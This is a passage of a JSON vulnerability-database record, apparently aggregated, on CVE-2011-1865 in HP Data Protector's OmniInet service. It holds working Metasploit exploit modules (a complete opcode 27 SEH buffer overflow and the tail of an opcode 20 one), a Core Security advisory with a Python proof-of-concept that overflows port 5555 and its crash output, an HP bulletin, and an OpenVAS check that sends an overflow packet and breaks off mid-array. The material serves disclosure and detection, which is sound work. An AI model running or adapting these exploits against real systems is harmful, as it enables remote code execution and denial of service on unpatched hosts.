Rex::Text.to_unicode(\"\\x20\")\n pkt << Rex::Text.to_unicode(\"20\") #Opcode\n pkt << \"\\x00\"\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\n pkt << Rex::Text.to_unicode(\"\\x20\\x00\")\n pkt << sploit\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\n\n #pkt length\n pkt[2,2] = [pkt.length-5].pack('n')\n\n print_status(\"Sending packet to #{datastore['RHOST']}...\")\n sock.put(pkt)\n\n #Data Protector lags before triggering the vuln code\n #Long delay seems necessary to ensure we get a shell back\n select(nil,nil,nil,20)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_4.rb"}, {"lastseen": "2020-08-27T01:01:45", "description": "This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.\n", "published": "2011-07-01T17:07:38", "type": "metasploit", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. 
By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\n {\n #POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\n 'Ret' => 0x7c35630d\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 29 2011'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n trigger = rand_text_alpha_upper(10000)\n trigger[4552, payload.encoded.length] = payload.encoded\n trigger[5352, 8] = generate_seh_record(target.ret)\n trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\n\n opcode = \"27\"\n\n packet = Rex::Text.to_unicode(\"\\x00\")\n packet << 
\"\\x27\\xca\" #length\n packet << \"\\xff\\xfe\\x32\"\n packet << \"\\x00\\x00\\x00\"\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\n packet << Rex::Text.to_unicode(\"\\x20\")\n packet << trigger\n packet << Rex::Text.to_unicode(\"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24\n\n print_status(\"Trying #{target.name}...\")\n sock.put(packet)\n\n select(nil,nil,nil,10)\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_3.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1865", "CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02872182\r\nVersion: 3\r\n\r\nHPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-06-28\r\nLast Updated: 2011-06-29\r\n\r\n -------------------------------------------------------------------------------\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities has been identified with HP OpenView Storage Data\r\nProtector. 
These vulnerabilities could be remotely exploited to execute arbitrary code.\r\n\r\nReferences: CVE-2011-1865, CORE-2011-0514; CVE-2011-1866, CORE-2011-0606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Storage Data Protector v6.20 running on Windows.\r\nHP OpenView Storage Data Protector v6.11 running on Windows.\r\nHP OpenView Storage Data Protector v6.10 running on Windows.\r\nHP OpenView Storage Data Protector v6.00 running on Windows.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-1865 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2011-1866 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Nahuel C. Riva and Oren Isacson at CORE-SECURITY.com for\r\nreporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following procedure to resolve these vulnerabilities.\r\n1. Upgrade to Data Protector A.06.20 or subsequent\r\n2. 
Enable encrypted control communication services on cell server and all clients in cell\r\n\r\nThe upgrade is available for download from http://hp.com/go/dataprotector then under 'Product\r\nInformation' click on 'Trials and Demos'.\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 28 June 2011 Initial release\r\nVersion: 2 (rev.2) - 28 June 2011 Updated attribution\r\nVersion: 3 (rev.3) - 29 June 2011 Corrected CVSS data\r\n\r\nhird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch\r\nmanagement policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email\r\nto: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be\r\nencrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:\r\nhttps://h41183.www4.hp.com/signup_alerts.php?lang=en&cc=US&prodSeriesId=&jumpid=hpsc_secbulletins\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\n 3C = 3COM\r\n 3P = 3rd Party Software\r\n GN = HP General Software\r\n HF = HP Hardware and Firmware\r\n MP = MPE/iX\r\n MU = Multi-Platform Software\r\n NS = NonStop Servers\r\n OV = OpenVMS\r\n PI = Printing and Imaging\r\n PV = ProCurve\r\n ST = Storage Software\r\n TU = Tru64 UNIX\r\n UX = HP-UX\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system\r\nintegrity. 
HP is continually reviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users\r\nof the affected HP products the important security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this information to their individual\r\nsituations and take appropriate action. HP does not warrant that this information is\r\nnecessarily accurate or complete for all user situations and, consequently, HP will not be\r\nresponsible for any damages resulting from user's use or disregard of the information provided\r\nin this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express\r\nor implied, including the warranties of merchantability and fitness for a particular purpose,\r\ntitle and non-infringement."\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions\r\ncontained herein. The information provided is provided "as is" without warranty of any kind. \r\nTo the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will\r\nbe liable for incidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or services; or damages for\r\nloss of data, or software restoration. The information in this document is subject to change\r\nwithout notice. 
Hewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4Lun4ACgkQ4B86/C0qfVlnbQCgrHWQHFYB5Gux1C5M7OiPW+Q+\r\n2XUAn3tiNudYuuArpTtX4IQdOA/G1a4f\r\n=BrzP\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26620", "title": "[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. 
*Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\xff\xfe\x32\x00\x00\x00"]\r\n\r\nfor s in args:\r\n packet.append("\x20\x00" + s + "\x00\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. 
Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerability 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. 
Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. 
Publication date is temporarily set to July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26621", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26621", "title": "CORE-2011-0514: Multiple vulnerabilities in HP Data Protector", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "Multiple vulnerabilities in TCP/5555 service.", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:VULN:11768", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11768", "title": "HP OpenView Storage Data Protector multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T15:46:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1865"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71823", "id": "SSV:71823", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71823"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - Multiple Vulnerabilities", "edition": 1, "published": "2011-06-29T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EXPLOITPACK:357E2A5253FECAF999A26172A2781370", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.", "modified": "2018-09-17T00:00:00", "published": "2011-07-01T00:00:00", "id": "OPENVAS:1361412562310902454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902454", "type": "openvas", "title": "HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $\n#\n# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:data_protector\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902454\");\n script_version(\"$Revision: 11421 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-1865\", \"CVE-2011-1514\", \"CVE-2011-1515\", \"CVE-2011-1866\");\n script_bugtraq_id(48486);\n script_name(\"HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"hp_data_protector_installed.nasl\");\n 
script_require_ports(\"Services/hp_dataprotector\", 5555);\n script_mandatory_keys(\"hp_data_protector/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17458/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/552\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/551\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code and lead to denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"HP (OpenView Storage) Data Protector 6.20 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to errors in the 'data protector inet' service\n command handling, which allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA\n\nsoc = open_sock_tcp( port );\nif( ! 
soc ) exit( 0 );\n\nheaddata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,\n 0x00, 0x20, 0x00 );\n\nmiddata = crap( data:raw_string( 0x61 ), length:10001 );\n\nlastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 